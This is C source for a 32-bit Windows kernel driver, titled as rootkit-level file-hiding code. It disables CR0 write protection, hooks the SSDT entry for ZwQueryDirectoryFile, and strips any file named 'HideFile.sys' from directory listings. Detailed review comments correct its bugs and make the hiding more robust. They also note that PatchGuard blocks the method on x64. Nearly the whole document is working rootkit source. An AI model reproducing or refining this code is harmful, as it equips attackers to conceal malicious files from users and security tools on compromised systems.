RootKit级别文件隐藏代码

//采用 SSDT Hook（仅适用于 32 位 Windows，在其上相对稳定；x64 上 SSDT 受 PatchGuard/KPP 保护，且任何 SSDT 完整性检查都能直接发现此类 Hook）

///直接看代码

#include "ZwQueryDirectoryFile.h"

/* CR0 value captured by WPOFF() and written back by WPON(). */
ULONG g_uCr0;
/* Original SSDT entry for ZwQueryDirectoryFile: filled in by DriverEntry,
 * used by NewZwQueryDirectoryFile to forward calls and by OnUnload to unhook. */
ZWQUERYDIRECTORYFILE OldZwQueryDirectoryFile;
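/*
 * SSDT-hook replacement for ZwQueryDirectoryFile.
 *
 * Forwards every call to the displaced original (OldZwQueryDirectoryFile).
 * When the original completed synchronously with STATUS_SUCCESS and the
 * caller asked for FileBothDirectoryInformation, every entry whose name is
 * exactly "HideFile.sys" (case-insensitive) is unlinked from the result
 * buffer before it is handed back.
 *
 * Parameters and return value are those of ZwQueryDirectoryFile.  The
 * original status is returned unchanged, except that STATUS_NO_MORE_FILES
 * is reported when the hidden file was the only entry in the buffer (the
 * original code dereferenced a NULL pLastFileInfo there).
 *
 * Fixes relative to the original:
 *  - only STATUS_SUCCESS is post-processed; NT_SUCCESS(STATUS_PENDING) is
 *    TRUE but the buffer is not filled yet for an asynchronous request;
 *  - FileName is read with FileNameLength instead of RtlInitUnicodeString
 *    (the field is not NUL-terminated);
 *  - whole-name compare instead of a prefix compare of strlen("HideFile.sys")
 *    bytes; no per-entry ANSI allocation, so no leak on each iteration;
 *  - RtlMoveMemory for the overlapping slide-down instead of RtlCopyMemory;
 *  - ULONG_PTR arithmetic and bounds checks against the caller's Length.
 *
 * Review notes (not changed here):
 *  - Classic 32-bit SSDT technique: the SSDT is PatchGuard-protected on x64
 *    and any SSDT integrity check reveals this hook.
 *  - FileInformation is the caller's buffer (normally user mode) and is
 *    walked in place without __try/__except, as in the original; the bounds
 *    checks only guard against a malformed entry chain.
 *  - Only FileBothDirectoryInformation is filtered; other information
 *    classes pass through untouched.
 *  - IoStatusBlock->Information is left at the value the original set.
 *  - With ReturnSingleEntry == TRUE, hiding the single returned entry ends
 *    the caller's enumeration early instead of fetching the next entry --
 *    TODO if that matters.
 */
NTSTATUS NewZwQueryDirectoryFile(
         IN  HANDLE FileHandle,
         IN  HANDLE Event OPTIONAL,
         IN  PIO_APC_ROUTINE ApcRoutine OPTIONAL,
         IN  PVOID ApcContext OPTIONAL,
         OUT PIO_STATUS_BLOCK IoStatusBlock,
         OUT PVOID FileInformation,
         IN  ULONG Length,
         IN  FILE_INFORMATION_CLASS FileInformationClass,
         IN  BOOLEAN ReturnSingleEntry,
         IN  PUNICODE_STRING FileName OPTIONAL,
         IN  BOOLEAN RestartScan
         )
{
    NTSTATUS status;
    UNICODE_STRING hideName;
    PUCHAR bufStart;
    PUCHAR bufEnd;
    PFILE_BOTH_DIR_INFORMATION cur;
    PFILE_BOTH_DIR_INFORMATION prev;

    RtlInitUnicodeString(&hideName, L"HideFile.sys");
    DbgPrint("hide: NewZwQueryDirectoryFile called.");

    status = OldZwQueryDirectoryFile(FileHandle,
                                     Event,
                                     ApcRoutine,
                                     ApcContext,
                                     IoStatusBlock,
                                     FileInformation,
                                     Length,
                                     FileInformationClass,
                                     ReturnSingleEntry,
                                     FileName,
                                     RestartScan);

    /*
     * Only a synchronous STATUS_SUCCESS completion has a filled buffer.
     * NT_SUCCESS() would also accept STATUS_PENDING, whose buffer is still
     * being written by the I/O manager.
     */
    if (status != STATUS_SUCCESS ||
        FileInformationClass != FileBothDirectoryInformation ||
        FileInformation == NULL)
    {
        return status;
    }

    bufStart = (PUCHAR)FileInformation;
    bufEnd   = bufStart + Length;
    prev     = NULL;
    cur      = (PFILE_BOTH_DIR_INFORMATION)bufStart;

    for (;;)
    {
        ULONG_PTR      remaining = (ULONG_PTR)(bufEnd - (PUCHAR)cur);
        UNICODE_STRING entryName;
        BOOLEAN        isLast;

        /*
         * Stop at the first entry that does not fit inside the caller's
         * buffer rather than read or copy outside it.  FileNameLength is
         * also capped at what a USHORT-counted UNICODE_STRING can hold.
         */
        if (remaining < FIELD_OFFSET(FILE_BOTH_DIR_INFORMATION, FileName) ||
            cur->FileNameLength > remaining - FIELD_OFFSET(FILE_BOTH_DIR_INFORMATION, FileName) ||
            cur->FileNameLength > 0xFFFF ||
            cur->NextEntryOffset > remaining)
        {
            break;
        }

        isLast = (cur->NextEntryOffset == 0);

        /*
         * FileName is NOT NUL-terminated; FileNameLength is its size in
         * bytes.  Build a counted string instead of RtlInitUnicodeString,
         * which would scan past the name into the following entry.
         */
        entryName.Buffer        = cur->FileName;
        entryName.Length        = (USHORT)cur->FileNameLength;
        entryName.MaximumLength = entryName.Length;

        /*
         * Whole-name, case-insensitive match (Windows file names are
         * case-insensitive).  The original compared only the first
         * strlen("HideFile.sys") bytes, so "HideFile.sys.bak" also matched,
         * and read past the end of shorter names.
         */
        if (RtlCompareUnicodeString(&entryName, &hideName, TRUE) != 0)
        {
            if (isLast)
            {
                break;
            }
            prev = cur;
            cur  = (PFILE_BOTH_DIR_INFORMATION)((PUCHAR)cur + cur->NextEntryOffset);
            continue;
        }

        if (isLast)
        {
            if (prev != NULL)
            {
                /* Trailing entry: terminate the chain at its predecessor. */
                prev->NextEntryOffset = 0;
            }
            else
            {
                /*
                 * The hidden file was the only entry in the buffer.  Report
                 * an exhausted enumeration instead of dereferencing NULL.
                 */
                status = STATUS_NO_MORE_FILES;
            }
            break;
        }

        /*
         * Middle entry: slide the remainder of the buffer down over it.
         * Source and destination overlap, so this must be RtlMoveMemory
         * (memmove semantics), not RtlCopyMemory.  cur now holds the next
         * entry and is re-examined without advancing.
         */
        RtlMoveMemory(cur,
                      (PUCHAR)cur + cur->NextEntryOffset,
                      remaining - cur->NextEntryOffset);
    }

    return status;
}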

/*
 * Clear CR0.WP (bit 16) on the current processor so that read-only kernel
 * pages -- here the SSDT -- can be written, and keep the previous CR0 in
 * g_uCr0 for WPON() to restore.
 *
 * Notes:
 *  - x86 MSVC inline assembly only; there is no x64 form of this, and on
 *    x64 the SSDT is PatchGuard-protected anyway.
 *  - `cli` is presumably meant to keep the thread from being preempted and
 *    migrated, so the SSDT write happens on the CPU whose CR0 was changed.
 *    It is issued after the CR0 write, so a dispatch interrupt in between
 *    could still migrate the thread; issuing `cli` first would close that
 *    window (not changed here).
 *  - Not reentrant: g_uCr0 is a single global.
 */
void WPOFF()
{
   ULONG uAttr;
_asm
{
  push eax;
  mov eax, cr0;
  mov uAttr, eax;
  and eax, 0FFFEFFFFh; // clear bit 16 (CR0.WP), leave the rest of CR0 intact
  mov cr0, eax;
  pop eax;
  cli
};
g_uCr0 = uAttr; // save the original CR0 value so WPON() can restore it
}
/*
 * Write back the CR0 value saved by WPOFF() (re-enabling write protection)
 * and re-enable interrupts.
 *
 * Note: `sti` runs before CR0 is restored, so there is a short window in
 * which an interrupt handler executes with WP still cleared.  Restoring CR0
 * first and issuing `sti` last would avoid that (not changed here).
 */
VOID WPON()
{

_asm
{
  sti
  push eax;
  mov eax, g_uCr0; // reload the CR0 value saved by WPOFF()
  mov cr0, eax;
  pop eax;
};

}
/*
 * Driver unload: put the original SSDT entry (saved in
 * OldZwQueryDirectoryFile by DriverEntry) back under the same WP-off/WP-on
 * bracket used to install the hook.  DriverObject is unused.
 *
 * Note: nothing here waits for threads that are still executing inside
 * NewZwQueryDirectoryFile.  Once the driver image is unmapped such a thread
 * faults in freed code; a reference count on the hook, or at least a delay
 * before returning, would be needed for a safe unload (not changed here).
 */
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
WPOFF();
UNHOOK(FUNINDEX,OldZwQueryDirectoryFile);
WPON();
}

/*
 * Driver entry point.  Installs NewZwQueryDirectoryFile into SSDT slot
 * FUNINDEX through the HOOK macro (declared in ZwQueryDirectoryFile.h) and
 * records the displaced original in OldZwQueryDirectoryFile so the hook can
 * forward calls and OnUnload can restore it.  theRegistryPath is unused.
 *
 * Returns STATUS_SUCCESS unconditionally; the outcome of HOOK is not
 * checked here because its definition is not visible in this file.
 */
extern "C"
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
                     IN PUNICODE_STRING theRegistryPath)
{
    PVOID pOld = NULL;

    /* The SSDT lives on a read-only page: drop CR0.WP around the swap. */
    WPOFF();
    HOOK(FUNINDEX, NewZwQueryDirectoryFile, pOld);
    OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)pOld;
    WPON();

    theDriverObject->DriverUnload = OnUnload;
    return STATUS_SUCCESS;
}
